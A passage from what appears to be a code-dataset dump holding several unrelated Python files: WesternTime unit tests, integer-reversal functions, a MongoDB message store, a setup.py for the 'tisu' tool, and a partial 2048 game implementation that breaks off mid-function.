pytest.raises(TypeError):\n WesternTime(invalid_par, 1, 1)\n with pytest.raises(TypeError):\n WesternTime(1, invalid_par, 1)\n for invalid_par in (\n (1,),\n [1],\n {1: 1},\n (),\n [],\n {},\n None,\n ): # \"1\" is acceptable for seconds, since it is a valid Fraction argument\n with pytest.raises(TypeError):\n WesternTime(1, 1, invalid_par)\n # exception with invalid numeric types\n for invalid_par in (1.0, Fraction(1, 1), Decimal(1), 1j, 1 + 1j, INF, NAN):\n with pytest.raises(TypeError):\n WesternTime(invalid_par, 1, 1)\n with pytest.raises(TypeError):\n WesternTime(1, invalid_par, 1)\n for invalid_par in (1j, 1 + 1j, INF, NAN):\n with pytest.raises(TypeError):\n WesternTime(1, 1, invalid_par)\n\n def test_110_invalid_parameter_types_in_hours(self):\n # exception with none, two or four parameters\n with pytest.raises(TypeError):\n WesternTime.in_hours()\n with pytest.raises(TypeError):\n WesternTime.in_hours(1, 2)\n # exception with non-numeric types\n for invalid_hours in ((1,), [1], {1: 1}, (), [], {}, None):\n with pytest.raises(TypeError):\n WesternTime.in_hours(invalid_hours)\n # exception with invalid numeric types\n for invalid_hours in (1j, 1 + 1j, INF, NAN):\n with 
pytest.raises(TypeError):\n WesternTime.in_hours(invalid_hours)\n\n def test_120_invalid_parameter_types_in_minutes(self):\n # exception with none, two or four parameters\n with pytest.raises(TypeError):\n WesternTime.in_minutes()\n with pytest.raises(TypeError):\n WesternTime.in_minutes(1, 2)\n # exception with non-numeric types\n for invalid_minutes in ((1,), [1], {1: 1}, (), [], {}, None):\n with pytest.raises(TypeError):\n WesternTime.in_minutes(invalid_minutes)\n # exception with invalid numeric types\n for invalid_minutes in (1j, 1 + 1j, INF, NAN):\n with pytest.raises(TypeError):\n WesternTime.in_minutes(invalid_minutes)\n\n def test_130_invalid_parameter_types_in_seconds(self):\n # exception with none, two or four parameters\n with pytest.raises(TypeError):\n WesternTime.in_seconds()\n with pytest.raises(TypeError):\n WesternTime.in_seconds(1, 2)\n\n # exception with non-numeric types\n for invalid_seconds in ((1,), [1], {1: 1}, (), [], {}, None):\n with pytest.raises(TypeError):\n WesternTime.in_seconds(invalid_seconds)\n\n # exception with invalid numeric types\n for invalid_seconds in (1j, 1 + 1j, INF, NAN):\n with pytest.raises(TypeError):\n WesternTime.in_seconds(invalid_seconds)\n\n def test_170_timezone_invalid(self):\n # exception with unknown named parameter\n with pytest.raises(TypeError):\n WesternTime(1, 2, 3, invalid=0)\n WesternTime.in_hours(\"789/123\", invalid=0)\n WesternTime.in_minutes(\"78901/123\", invalid=0)\n WesternTime.in_seconds(\"789012/123\", invalid=0)\n\n # exception with non-numeric types\n for invalid_to_utc in ((1,), [1], {1: 1}, (), [], {}):\n with pytest.raises(TypeError):\n WesternTime(1, 2, 3, to_utc=invalid_to_utc)\n with pytest.raises(TypeError):\n WesternTime.in_hours(\"789/123\", to_utc=invalid_to_utc)\n with pytest.raises(TypeError):\n WesternTime.in_minutes(\"78901/123\", to_utc=invalid_to_utc)\n with pytest.raises(TypeError):\n WesternTime.in_seconds(\"789012/123\", to_utc=invalid_to_utc)\n\n # exception with invalid numeric types\n for invalid_to_utc in (1j, 1 + 1j, INF, NAN):\n with pytest.raises(TypeError):\n WesternTime(1, 2, 3, to_utc=invalid_to_utc)\n with pytest.raises(TypeError):\n WesternTime.in_hours(\"789/123\", to_utc=invalid_to_utc)\n with pytest.raises(TypeError):\n WesternTime.in_minutes(\"78901/123\", to_utc=invalid_to_utc)\n with pytest.raises(TypeError):\n WesternTime.in_seconds(\"789012/123\", to_utc=invalid_to_utc)\n\n def test_190_invalid_parameter_types_day_frac(self):\n # exception with none, two or four parameters\n with pytest.raises(TypeError):\n WesternTime.from_day_frac()\n with pytest.raises(TypeError):\n WesternTime.from_day_frac(1, 2)\n\n # exception with non-numeric types\n for invalid_day_frac in (\"1\", (1,), [1], {1: 1}, (), [], {}, None):\n with pytest.raises(TypeError):\n WesternTime.from_day_frac(invalid_day_frac)\n\n # exception with invalid numeric types\n for invalid_day_frac in (1.0, Decimal(1), 1j, 1 + 1j, INF, NAN):\n with pytest.raises(TypeError):\n WesternTime.from_day_frac(invalid_day_frac)\n\n def test_200_invalid_values(self):\n for test_row in western_time_out_of_range_data:\n hour = test_row[0]\n minute = test_row[1]\n second = test_row[2]\n with pytest.raises(ValueError):\n WesternTime(hour, minute, second)\n\n def test_210_invalid_values_in_hours(self):\n for num, denum in ((24, 1), (1, -1), (24000001, 1000000), (-1, 1000000)):\n with pytest.raises(ValueError):\n WesternTime.in_hours(Fraction(num, denum))\n\n def test_220_invalid_values_in_minutes(self):\n for num, denum in ((1440, 1), 
(1, -1), (1440000001, 1000000), (-1, 1000000)):\n with pytest.raises(ValueError):\n WesternTime.in_minutes(Fraction(num, denum))\n\n def test_230_invalid_values_in_seconds(self):\n for num, denum in ((86400, 1), (1, -1), (86400000001, 1000000), (-1, 1000000)):\n with pytest.raises(ValueError):\n WesternTime.in_seconds(Fraction(num, denum))\n\n def test_260_timezone_invalid_values(self):\n for invalid_value in (-25, -24.000001, 24.000001, 25):\n with pytest.raises(ValueError):\n WesternTime(1, 2, 3, to_utc=invalid_value)\n with pytest.raises(ValueError):\n WesternTime.in_hours(\"789/123\", invalid_value)\n with pytest.raises(ValueError):\n WesternTime.in_minutes(\"78901/123\", invalid_value)\n with pytest.raises(ValueError):\n WesternTime.in_seconds(\"789012/123\", invalid_value)\n\n def test_290_invalid_values_day_frac(self):\n for num, denum in ((1, 1), (1, -1), (1000001, 1000000), (-1, 1000000)):\n with pytest.raises(ValueError):\n WesternTime.from_day_frac(Fraction(num, denum))\n\n def test_300_write_attribute(self):\n western = WesternTime(10, 10, 10)\n with pytest.raises(AttributeError):\n western.hour = 3\n with pytest.raises(AttributeError):\n western.minute = 3\n with pytest.raises(AttributeError):\n western.second = 3\n\n def test_310_write_attribute_to_utc(self):\n western = WesternTime(10, 10, 10, to_utc=10)\n with pytest.raises(AttributeError):\n western.to_utc = 3\n\n def test_500_compare(self):\n western1 = WesternTime(2, 3, 4)\n western2 = WesternTime(2, 3, 4)\n assert western1 == western2\n assert western1 <= western2\n assert western1 >= western2\n assert not western1 != western2\n assert not western1 < western2\n assert not western1 > western2\n\n for hour, minute, second in (3, 3, 3), (2, 4, 4), (2, 3, 5):\n western3 = WesternTime(hour, minute, second) # this is larger than western1\n assert western1 < western3\n assert western3 > western1\n assert western1 <= western3\n assert western3 >= western1\n assert western1 != western3\n assert western3 != western1\n assert not western1 == western3\n assert not western3 == western1\n assert not western1 > western3\n assert not western3 < western1\n assert not western1 >= western3\n assert not western3 <= western1\n\n def test_510_compare_invalid_types(self):\n class SomeClass:\n pass\n\n western = WesternTime(2, 3, 4)\n\n # exception with non-numeric types\n for par in (\"1\", (1,), [1], {1: 1}, (), [], {}, None):\n assert not western == par\n assert western != par\n with pytest.raises(TypeError):\n western < par\n with pytest.raises(TypeError):\n western > par\n with pytest.raises(TypeError):\n western <= par\n with pytest.raises(TypeError):\n western >= par\n # exception with numeric types (all invalid) and other objects\n for par in (\n 1,\n 1.0,\n Fraction(1, 1),\n Decimal(1),\n 1j,\n 1 + 1j,\n INF,\n NAN,\n SomeClass(),\n ):\n assert not western == par\n assert western != par\n with pytest.raises(TypeError):\n western < par\n with pytest.raises(TypeError):\n western > par\n with pytest.raises(TypeError):\n western <= par\n with pytest.raises(TypeError):\n western >= par\n\n def test_520_hash_equality(self):\n western1 = WesternTime(11, 12, 13)\n # same thing\n western2 = WesternTime(11, 12, 13)\n assert hash(western1) == hash(western2)\n\n dic = {western1: 1}\n dic[western2] = 2\n assert len(dic) == 1\n assert dic[western1] == 2\n assert dic[western2] == 2\n\n western3 = WesternTime(1, 12, 13).replace(hour=11)\n assert hash(western1) == hash(western3)\n\n dic[western3] = 2\n assert len(dic) == 1\n assert dic[western3] == 
2\n\n def test_530_bool(self):\n for test_row in western_time_test_data:\n hour = test_row[1][0]\n minute = test_row[1][1]\n second = Fraction(test_row[1][2])\n assert WesternTime(hour, minute, second)\n\n def test_600_to_hours(self):\n for test_row in western_time_test_data:\n hour = test_row[1][0]\n minute = test_row[1][1]\n second = Fraction(test_row[1][2])\n to_hours = Fraction(test_row[2])\n assert WesternTime(hour, minute, second).to_hours() == to_hours\n\n def test_610_to_minutes(self):\n for test_row in western_time_test_data:\n hour = test_row[1][0]\n minute = test_row[1][1]\n second = Fraction(test_row[1][2])\n to_minutes = Fraction(test_row[3])\n assert WesternTime(hour, minute, second).to_minutes() == to_minutes\n\n def test_620_to_seconds(self):\n for test_row in western_time_test_data:\n hour = test_row[1][0]\n minute = test_row[1][1]\n second = Fraction(test_row[1][2])\n to_seconds = Fraction(test_row[4])\n assert WesternTime(hour, minute, second).to_seconds() == to_seconds\n\n def test_630_to_day_frac(self):\n for test_row in western_time_test_data:\n day_frac = Fraction(test_row[0])\n hour = test_row[1][0]\n minute = test_row[1][1]\n second = Fraction(test_row[1][2])\n assert WesternTime(hour, minute, second).to_day_frac() == day_frac\n\n def test_650_replace(self):\n for test_row in western_time_test_data:\n hour = test_row[1][0]\n minute = test_row[1][1]\n second = Fraction(test_row[1][2])\n western = WesternTime(hour, minute, second)\n assert western.replace() == WesternTime(hour, minute, second)\n assert western.replace(hour=11) == WesternTime(11, minute, second)\n assert western.replace(minute=10) == WesternTime(hour, 10, second)\n assert western.replace(second=9) == WesternTime(hour, minute, 9)\n assert western.replace(minute=10, hour=11) == WesternTime(11, 10, second)\n assert western.replace(second=9, hour=11) == WesternTime(11, minute, 9)\n assert western.replace(second=9, minute=10) == WesternTime(hour, 10, 9)\n assert western.replace(second=9, minute=10, hour=11) == WesternTime(\n 11, 10, 9\n )\n\n def test_653_replace_invalid_types(self):\n western = WesternTime(11, 10, 9)\n # exception for positional parameters\n with pytest.raises(TypeError):\n western.replace(1)\n # exception with non-numeric types\n for par in (\"1\", (1,), [1], {1: 1}, (), [], {}):\n with pytest.raises(TypeError):\n western.replace(hour=par)\n with pytest.raises(TypeError):\n western.replace(minute=par)\n for par in ((1,), [1], {1: 1}, (), [], {}):\n with pytest.raises(TypeError):\n western.replace(second=par)\n # exception with invalid numeric types\n for par in (1.0, Fraction(1, 1), Decimal(1), 1j, 1 + 1j, INF, NAN):\n with pytest.raises(TypeError):\n western.replace(hour=par)\n with pytest.raises(TypeError):\n western.replace(minute=par)\n for par in (1j, 1 + 1j, INF):\n with pytest.raises(TypeError):\n western.replace(second=par)\n\n def test_656_replace_invalid_values(self):\n western1 = WesternTime(11, 10, 9)\n with pytest.raises(ValueError):\n western1.replace(hour=-1)\n with pytest.raises(ValueError):\n western1.replace(minute=-1)\n with pytest.raises(ValueError):\n western1.replace(second=-1)\n with pytest.raises(ValueError):\n western1.replace(hour=24)\n with pytest.raises(ValueError):\n western1.replace(minute=60)\n with pytest.raises(ValueError):\n western1.replace(second=60)\n with pytest.raises(TypeError):\n western1.replace(second=NAN)\n\n def test_700_repr(self):\n import datetime2\n\n for test_row in western_time_test_data:\n hour = test_row[1][0]\n minute = 
test_row[1][1]\n second = Fraction(test_row[1][2])\n western = WesternTime(hour, minute, second)\n western_repr = repr(western)\n assert western_repr.startswith(\n \"datetime2.western.WesternTime(\"\n ) and western_repr.endswith(\")\")\n args = western_repr[30:-1]\n found_hour, found_minute, found_second = args.split(\",\", 2)\n assert western == eval(western_repr)\n assert int(found_hour.strip()) == hour\n assert int(found_minute.strip()) == minute\n assert Fraction(eval(found_second)) == second\n\n def test_720_str(self):\n for test_row in western_time_test_data:\n hour = test_row[1][0]\n minute = test_row[1][1]\n second = Fraction(test_row[1][2])\n western = WesternTime(hour, minute, second)\n expected = \"{:02d}:{:02d}:{:02d}\".format(hour, minute, floor(second))\n assert str(western) == expected\n\n def test_730_cformat_numbers(self):\n for test_row in western_time_test_data:\n hour = test_row[1][0]\n minute = test_row[1][1]\n second = Fraction(test_row[1][2])\n western = WesternTime(hour, minute, second)\n # hours\n assert western.cformat(\"%H\") == \"{:02d}\".format(hour)\n if hour == 0:\n assert western.cformat(\"%I\") == \"12\"\n assert western.cformat(\"%p\") == \"AM\"\n elif hour <= 11:\n assert western.cformat(\"%I\") == \"{:02d}\".format(hour)\n assert western.cformat(\"%p\") == \"AM\"\n elif hour == 12:\n assert western.cformat(\"%I\") == \"{:02d}\".format(hour)\n assert western.cformat(\"%p\") == \"PM\"\n else:\n assert western.cformat(\"%I\") == \"{:02d}\".format(hour - 12)\n assert western.cformat(\"%p\") == \"PM\"\n # minutes and seconds\n assert western.cformat(\"%M\") == \"{:02d}\".format(minute)\n assert western.cformat(\"%S\") == \"{:02d}\".format(floor(second))\n\n def test_740_cformat_microseconds(self):\n for fraction, microseconds in western_time_microseconds:\n western = WesternTime.in_seconds(Fraction(fraction))\n assert western.cformat(\"%f\") == microseconds\n\n def test_750_cformat_percent(self):\n western = WesternTime(1, 2, 3)\n assert western.cformat(\"%\") == \"%\"\n assert western.cformat(\"%%\") == \"%\"\n assert western.cformat(\"%%%\") == \"%%\"\n assert western.cformat(\"abcd%\") == \"abcd%\"\n assert western.cformat(\"%k\") == \"%k\"\n assert western.cformat(\"a%k\") == \"a%k\"\n assert western.cformat(\"%k%\") == \"%k%\"\n\n def test_760_cformat_invalid_type(self):\n western = WesternTime(1, 2, 3)\n for par in (1, (1,), [1], {1: 1}, None):\n with pytest.raises(TypeError):\n western.cformat(par)\n\n def test_900_pickling(self):\n for test_row in western_time_test_data:\n hour = test_row[1][0]\n minute = test_row[1][1]\n second = Fraction(test_row[1][2])\n western = WesternTime(hour, minute, second)\n for protocol in range(pickle.HIGHEST_PROTOCOL + 1):\n pickled = pickle.dumps(western, protocol)\n derived = pickle.loads(pickled)\n assert western == derived\n\n def test_920_subclass(self):\n class W(WesternTime):\n theAnswer = 42\n\n def __init__(self, *args, **kws):\n temp = kws.copy()\n self.extra = temp.pop(\"extra\")\n WesternTime.__init__(self, *args, **temp)\n\n def newmeth(self, start):\n return start + self.hour + self.second\n\n western1 = WesternTime(11, 12, 13)\n western2 = W(11, 12, 13, extra=7)\n\n assert western2.theAnswer == 42\n assert western2.extra == 7\n assert western1.to_day_frac() == western2.to_day_frac()\n assert western2.newmeth(-7) == western1.hour + western1.second - 
7\n","sub_path":"tests/time_representations/test_western_time.py","file_name":"test_western_time.py","file_ext":"py","file_size_in_byte":28056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"354635036","text":"# encoding:utf-8\n\n'''Things to note:\n1. Trailing zeros\n2. Negative numbers\n3. Overflow and underflow\n'''\n\n\ndef reverse(x):\n \"\"\"\n :type x: int\n :rtype: int\n \"\"\"\n s_min = str(2 ** 31)\n if x == 0:\n return 0\n if x < 0:\n sign = '-'\n else:\n sign = ''\n s = str(x).lstrip('-').rstrip('0')[::-1]\n if len(s) >= 10 and s > s_min:\n return 0\n else:\n return int(sign + s)\n\n\ndef reverse1(x):\n s = -1 if x < 0 else 1 # sign of x, i.e. cmp(x, 0)\n r = int(str(s * x)[::-1])\n return s * r * (r < 2 ** 31)\n\n\ndef reverse2(x):\n if x == 0:\n return 0\n sign = 1\n if x < 0:\n sign = -1\n tmp = int(str(x * sign)[::-1])\n return tmp * sign * (tmp < 2 ** 31)\n\n\nif __name__ == '__main__':\n x = -10 # -120#-123#1534236469\n print(reverse2(x))\n","sub_path":"simple/reverse-integer.py","file_name":"reverse-integer.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"505338563","text":"#!/usr/bin/python2.7\n# Copyright 2012 JatLeGo Inc. All Rights Reserved.\n# Author: andyzh1314@gmail.com (Andy Zhau)\n\nimport bson\nimport time\n\nfrom base import logging\nfrom dsc.framework.db import datasource_pb2\nfrom dsc.framework.db import messages_pb2\nfrom dsc.framework.mongodb import db\nfrom pymongo import ASCENDING\nfrom pymongo import DESCENDING\nfrom util.pb import DictToProtobuf\nfrom util.pb import ProtobufToDict\n\n\n_DataSources = [\"all\", \"dsc\", \"twitter\", \"weibo\"]\n_MessageLineNames = [\"homeline\", \"mentions\", \"favorites\", \"comments\", \"reshare\"]\n_UserMessageLine = (messages_pb2.HOMELINE, messages_pb2.MENTIONS,\n messages_pb2.FAVORITES)\n_MessageMessageLine = (messages_pb2.COMMENTS, messages_pb2.RESHARE)\n\n_MessageCollection = db[\"messages_v2\"]\n_Collection = lambda ds, ml: (\n _MessageCollection[_MessageLineNames[ml]][_DataSources[ds]])\n\n_CreateTime = lambda m: max(m.dsc.create_time, m.twitter.create_time,\n m.weibo.create_time)\n\ndef _Query(l):\n if l[\"messageline_type\"] in _UserMessageLine:\n if l[\"uid\"] is None:\n raise ValueError(\"uid could not be None for [messages.%s.%s].\" % (\n _MessageLineNames[l[\"messageline_type\"]],\n _DataSources[l[\"datasource\"]]))\n return { \"uid\": l[\"uid\"] }\n elif l[\"messageline_type\"] in _MessageMessageLine:\n if l[\"omid\"] is None:\n raise ValueError(\"omid could not be None for [messages.%s.%s].\" % (\n _MessageLineNames[l[\"messageline_type\"]],\n _DataSources[l[\"datasource\"]]))\n return { \"omid\": l[\"omid\"] }\n\nclass MessageDb(object):\n\n\n def __init__(self, safe):\n self.safe = safe\n #self.EnsureIndex()\n\n def GetMessageLine(self, datasource, messageline_type, since_id=None,\n max_id=None, count=20, uid=None, omid=None):\n collection = _Collection(datasource, messageline_type)\n query = _Query(locals())\n\n since_ct = max_ct = None\n if since_id is not None:\n q = _Query(locals())\n q[\"mid\"] = since_id\n doc = collection.find_one(q)\n if doc is None:\n raise ValueError(\n \"Since id [%s] doesn't exist under collection [%s].\" % (\n since_id, collection.name))\n query.setdefault(\"create_time\", {})\n query[\"create_time\"][\"$gte\"] = since_ct = doc[\"create_time\"]\n if max_id is not None:\n q = _Query(locals())\n q[\"mid\"] = max_id\n doc = collection.find_one(q)\n if doc is None:\n raise ValueError(\n \"Max id 
[%s] doesn't exists under collection [%s].\" % (\n max_id, collection.name))\n query.setdefault(\"create_time\", {})\n query[\"create_time\"][\"$lte\"] = max_ct = doc[\"create_time\"]\n messages = []\n for doc in collection.find(query, sort=[(\"create_time\", DESCENDING),\n (\"mid\", DESCENDING)]):\n if max_ct == doc[\"create_time\"] and doc[\"mid\"] >= max_ct:\n continue\n if since_ct == doc[\"create_time\"] and doc[\"mid\"] <= since_id:\n break\n m = self.GetMessage(mid=doc[\"mid\"])\n if m is None:\n logging.Error(\"Wrong mid [%s] found in message lines.\" % doc[\"mid\"])\n messages.append(m)\n if len(messages) >= count:\n break\n return messages\n\n def UpdateMessageLine(self, datasource, messageline_type, messages, uid=None,\n omid=None):\n last_update = int(time.time())\n\n def UpdateIfNotExists(collection, query, message):\n doc = collection.find_one(query)\n if doc is None:\n doc = {\n \"_id\": bson.ObjectId(),\n \"mid\": message._id,\n \"create_time\": _CreateTime(message),\n \"last_update\": last_update,\n }\n if uid is not None: doc[\"uid\"] = uid\n if omid is not None: doc[\"omid\"] = omid\n collection.save(doc)\n else:\n collection.update({\"_id\": doc[\"_id\"]},\n {\"$set\": {\"last_update\": last_update}})\n\n dscollection = _Collection(datasource, messageline_type)\n allcollection = _Collection(0, messageline_type)\n for message in messages:\n query = _Query(locals())\n query[\"mid\"] = message._id\n UpdateIfNotExists(dscollection, query, message)\n UpdateIfNotExists(allcollection, query, message)\n\n def UpdateCreateTime(self, message):\n datasources = [datasource_pb2.ALL]\n if message.dsc.create_time:\n datasources.append(datasource_pb2.DSC)\n if message.twitter.create_time:\n datasources.append(datasource_pb2.TWITTER)\n if message.weibo.create_time:\n datasources.append(datasource_pb2.WEIBO)\n for ds in datasources:\n for ml in _UserMessageLine + _MessageMessageLine:\n c = _Collection(ds, ml)\n c.update({\"mid\": message._id},\n {\"$set\": {\"create_time\": _CreateTime(message)}}, multi=True)\n\n @classmethod\n def EnsureIndex(cls):\n _MessageCollection.ensure_index(\n \"dsc.id\", name=\"dsc_id\", unique=True, sparse=True)\n _MessageCollection.ensure_index(\n \"twitter.id\", name=\"twitter_id\", unique=True, sparse=True)\n _MessageCollection.ensure_index(\n \"weibo.id\", name=\"weibo_id\", unique=True, sparse=True)\n for ds in range(4):\n for ml in range(3):\n if ml in _UserMessageLine:\n _Collection.ensure_index([(\"mid\", ASCENDING),\n (\"uid\", ASCENDING)])\n _Collection(ds, ml).ensure_index([(\"uid\", ASCENDING),\n (\"create_time\", DESCENDING),\n (\"last_update\", DESCENDING)])\n elif ml in _MessageMessageLine:\n _Collection.ensure_index([(\"mid\", ASCENDING),\n (\"omid\", ASCENDING)])\n _Collection(ds, ml).ensure_index([(\"omid\", ASCENDING),\n (\"create_time\", DESCENDING),\n (\"last_update\", DESCENDING)])\n\n def SaveMessage(self, message):\n \"\"\" Save the mesage, if no field set up for _id, insert a value on it. 
\"\"\"\n if not message._id: message._id = str(bson.ObjectId())\n self._SaveMessageProtobuf(message)\n return message\n\n def CreateMessage(self, uid, text, twitter=False, weibo=False):\n \"\"\" Create a message record in mongodb.\n\n This function will set the current utc timestamp to the dsc field, and put the text\n message into the dsc field, also other fields if necessary.\n\n In this step the twitter or weibo message id is not stored, so use\n UpdateMessage later when the information is ready.\n\n Args:\n uid: The id of the user who creates the message.\n text: The text of the message.\n twitter: Whether the current text will be applied to twitter sub-field.\n weibo: Whether the current text will be applied to weibo sub-field.\n\n Returns:\n The message record protobuf, instance of messages_pb2.Message.\n\n Raises:\n ValueError: When the uid is not valid or text is empty string or\n non-readable.\n\n \"\"\"\n logging.Info(\"Create message.\")\n if uid is None:\n raise ValueError(\"Uid can't be none.\")\n if not text:\n raise ValueError(\"Text should not be empty.\")\n create_time = int(time.time())\n doc = {\n \"_id\": bson.ObjectId(),\n \"dsc\": {\n \"text\": text,\n \"uid\": unicode(uid),\n \"create_time\": create_time,\n \"last_update\": create_time,\n },\n \"twitter\": {},\n \"weibo\": {},\n }\n doc[\"dsc\"][\"id\"] = str(doc[\"_id\"])\n if twitter: doc[\"twitter\"] = { \"text\": text, \"last_update\": create_time }\n if weibo: doc[\"weibo\"] = { \"text\": text, \"last_update\": create_time }\n self._SaveMessageDoc(doc)\n return self._DocToMessageProtobuf(doc)\n\n def UpdateMessage(self, message, twitter_mid=None, weibo_mid=None,\n twitter_comments_count=None, weibo_reshare_count=None,\n weibo_comments_count=None, dsc_id_range_min=None,\n dsc_id_range_max=None, twitter_id_range_min=None,\n twitter_id_range_max=None, weibo_id_range_min=None,\n weibo_id_range_max=None):\n \"\"\" Update the current message protobuf to mongodb.\n\n Args are the field values to update.\n\n Returns:\n The updated message protobuf.\n\n Raises:\n TypeError: if the type of a parameter is not correct.\n\n \"\"\"\n updator = {}\n if twitter_mid is not None:\n if message.twitter.id:\n raise ValueError(\n \"Twitter mid already exists, message [%s].\" % unicode(message))\n # Verify the value type is accepted, same as below.\n updator[\"twitter.id\"] = message.twitter.id = str(twitter_mid)\n if weibo_mid is not None:\n if message.weibo.id:\n raise ValueError(\n \"Weibo mid already exists, message [%s].\" % unicode(message))\n updator[\"weibo.id\"] = message.weibo.id = str(weibo_mid)\n\n for src, item in ((\"twitter\", \"comments_count\"),\n (\"weibo\", \"comments_count\"),\n (\"weibo\", \"reshare_count\")):\n new_val = locals()[src + \"_\" + item]\n if (new_val is not None and\n new_val != getattr(getattr(message, src), item)):\n updator[src + \".\" + item] = new_val\n try:\n setattr(getattr(message, src), item, new_val)\n except TypeError as e:\n raise TypeError(\n \"Type of %s_%s wrong, the value %s\" % (src, item, str(e)))\n\n for src in (\"dsc\", \"twitter\", \"weibo\"):\n for item in (\"id_range_min\", \"id_range_max\"):\n new_val = locals()[src + \"_\" + item]\n if new_val is None:\n continue\n new_val = str(new_val)\n if (getattr(getattr(message, src), item) != new_val and\n getattr(message, src).id != new_val):\n updator[src + \".\" + item] = new_val\n try:\n setattr(getattr(message, src), item, new_val)\n except TypeError as e:\n raise TypeError(\n \"Type of %s_%s wrong, the value %s\" % (src, item, str(e)))\n if 
updator:\n _MessageCollection.update(\n {\"_id\": bson.ObjectId(message._id)}, {\"$set\": updator}, safe=self.safe)\n return self.GetMessage(mid=message._id, verify=self.safe)\n\n def GetMessage(self, mid=None, dsc_mid=None, twitter_mid=None, weibo_mid=None,\n verify=False):\n \"\"\" Get the message record protobuf from mongodb.\n\n \"\"\"\n if mid is not None: query = { \"_id\": bson.ObjectId(mid) }\n elif dsc_mid is not None: query = { \"dsc.id\": str(dsc_mid) }\n elif twitter_mid is not None: query = { \"twitter.id\": str(twitter_mid) }\n elif weibo_mid is not None: query = { \"weibo.id\": str(weibo_mid) }\n else: raise ValueError(\"No useful information found.\")\n return self._DocToMessageProtobuf(_MessageCollection.find_one(query), verify)\n\n @staticmethod\n def _DocToMessageProtobuf(doc, verify=False):\n \"\"\" Convert doc to message protobuf. \"\"\"\n message = DictToProtobuf(doc, messages_pb2.Message())\n if verify: MessageDb._Verify(message) # staticmethod, so no self here\n return message\n\n def _SaveMessageProtobuf(self, message):\n def Default(field, value):\n if field.name == \"_id\": return bson.ObjectId(value)\n return value\n self._SaveMessageDoc(ProtobufToDict(message, default=Default))\n\n def _SaveMessageDoc(self, doc):\n try:\n _MessageCollection.save(doc, safe=self.safe)\n except Exception as e:\n logging.Exception(e)\n raise\n\n @staticmethod\n def _Verify(message):\n return message.IsInitialized()\n","sub_path":"dsc/framework/db/messages.py","file_name":"messages.py","file_ext":"py","file_size_in_byte":11422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"587962882","text":"# -*- coding: utf-8 -*-\nfrom setuptools import setup\n\nlong_description = open('README.md').read() + '\\n' + open('HISTORY.md').read()\n\nsetup(\n name='tisu',\n version='1.1',\n description=\"your project's issue tracker, in a text file\",\n long_description=long_description,\n long_description_content_type='text/markdown',\n author=u'Martín Gaitán',\n author_email='gaitan@gmail.com',\n url='https://github.com/mgaitan/tissue',\n license='BSD',\n keywords=\"github issues tracking bugs markdown\",\n packages=['tisu'],\n install_requires=['recommonmark', 'pygithub', 'docopt'],\n entry_points={\n 'console_scripts': ['tisu=tisu.cli:main'],\n },\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Environment :: Console',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n ],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"459582195","text":"import collections, random\nimport numpy as np\nimport copy\nimport random as rand\n\nclass Game_2048:\n '''\n Creates a game of 2048.\n Access self.board in the same way as a matrix, i.e. 
self.board[row][col].\n '''\n \n def __init__(self, board, tableL, tableR, scoreTable):\n self.size = 4\n self.board = 1 << (4 * rand.randint(0,15))\n self.options = ['a', 's', 'd', 'w']\n self.randomize = False\n if tableL != None:\n self.tableL = tableL\n self.tableR = tableR\n self.scoreTable = scoreTable\n else:\n self.initTables()\n\n\n '''\n -----------------\n UTILITY FUNCTIONS\n -----------------\n '''\n def initTables(self):\n self.tableL = {}\n self.tableR = {}\n self.scoreTable = {}\n num = self.size << 2\n for a in range(num):\n for b in range(num):\n for c in range(num):\n for d in range(num):\n row = np.asarray([a,b,c,d])\n if sum(row) == 0:\n self.tableL[0] = 0\n self.tableR[0] = 0\n self.scoreTable[0] = 0\n continue\n rowL = row[row != 0].copy()\n rowR = row[row != 0]\n rowlist = rowL.tolist()\n for i in range(rowL.size - 1):\n if rowlist[i] == rowlist[i + 1]:\n rowlist[i] += 1\n rowlist[i + 1] = 0\n newrowL = [x for x in rowlist if x != 0]\n newrowL = np.asarray(newrowL + np.zeros(self.size - len(newrowL)).tolist())\n newrowL = list(map(int, newrowL))\n rowlist = rowR.tolist()\n for i in range(rowR.size - 1, 0, -1):\n if rowlist[i] == rowlist[i - 1]:\n rowlist[i] += 1\n rowlist[i - 1] = 0\n newrowR = [x for x in rowlist if x != 0]\n newrowR = np.asarray(np.zeros(self.size - len(newrowR)).tolist() + newrowR)\n newrowR = list(map(int, newrowR))\n key = row[0] << 12 | row[1] << 8 | row[2] << 4 | row[3]\n valL = newrowL[0] << 12 | newrowL[1] << 8 | newrowL[2] << 4 | newrowL[3]\n valR = newrowR[0] << 12 | newrowR[1] << 8 | newrowR[2] << 4 | newrowR[3]\n self.tableL[key] = valL\n self.tableR[key] = valR\n score = 0\n for x in range(self.size):\n val = row[x]\n if val > 1:\n score += (val - 1) * (1 << val)\n self.scoreTable[key] = score\n \n \n def bitToBoard(self):\n board = np.zeros(self.size ** 2)\n for k in range(self.size ** 2):\n board[k] = 1 << ((self.board >> (4 * k)) & 0xF)\n if board[k] == 1:\n board[k] = 0\n board = board[::-1].reshape((self.size, self.size))\n return board\n \n def printBoard(self):\n print(self.bitToBoard())\n print('')\n\n def countZeros(self):\n count = 0\n for x in range(self.size ** 2):\n i = 0xF << x\n if i & self.board == 0:\n count+=1\n return count\n \n def emptyPos(self):\n lst = []\n for x in range(self.size ** 2):\n i = 0xF << (4 * x)\n if i & self.board == 0:\n lst.append(x)\n return lst\n \n def transpose(self,board):\n c1 = board & 0xF0F00F0FF0F00F0F\n c2 = board & 0x0000F0F00000F0F0\n c3 = board & 0x0F0F00000F0F0000\n c = c1 | (c2 << 12) | (c3 >> 12)\n d1 = c & 0xFF00FF0000FF00FF\n d2 = c & 0x00FF00FF00000000\n d3 = c & 0x00000000FF00FF00\n return d1 | (d2 >> 24) | (d3 << 24)\n \n\n '''\n ----------------------\n GAME RUNNING FUNCTIONS\n ----------------------\n ''' \n def placeRandomTile(self):\n empty_pos = self.emptyPos()\n if len(empty_pos) == 0: return\n \n if 